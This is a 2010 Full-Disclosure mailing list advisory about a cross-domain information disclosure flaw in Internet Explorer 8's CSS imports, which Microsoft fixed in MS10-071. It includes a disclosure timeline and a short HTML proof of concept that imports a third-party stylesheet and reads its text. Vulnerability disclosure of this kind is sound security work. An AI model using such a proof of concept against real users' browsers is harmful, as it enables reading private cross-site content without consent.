[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] IE8 Css Cross-Domain Information Disclosure Vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] IE8 Css Cross-Domain Information Disclosure Vulnerability
- From: IEhrepus <5up3rh3i@xxxxxxxxx>
- Date: Thu, 14 Oct 2010 22:27:03 +0800
IE8 Css Cross-Domain Information Disclosure Vulnerability
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2010/10/14
References:
http://www.80vul.com/ie8/IE8%20Css%20Cross-Domain%20Information%20Disclosure%20Vulnerability.txt
Overview:
MS-071 have fixed a Cross-Domain Information Disclosure Vulnerability
by CSS imports() on IE8, this vul look like had fixed on 2005 by
hacker.co.il[1],but when it work well on IE8 .
POC[2]:
<html>
<head>
<style>
@import url("http://hi.baidu.com/hi_heige";);
</style>
<script>
function loaded() {
alert(document.styleSheets(0).imports(0).cssText);
}
</script>
</head>
<body onload="loaded()">
</body>
</html>
Disclosure Timeline:
2010/09/09 - Found this Vulnerability
2010/10/12 - Microsoft Security Bulletin MS10-071 Published
2010/10/14 - Public Disclosure
References:
[1] http://www.hacker.co.il/security/ie/css_import.html
[2] http://80vul.com/cssinj/ms071.html
--
hitest
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/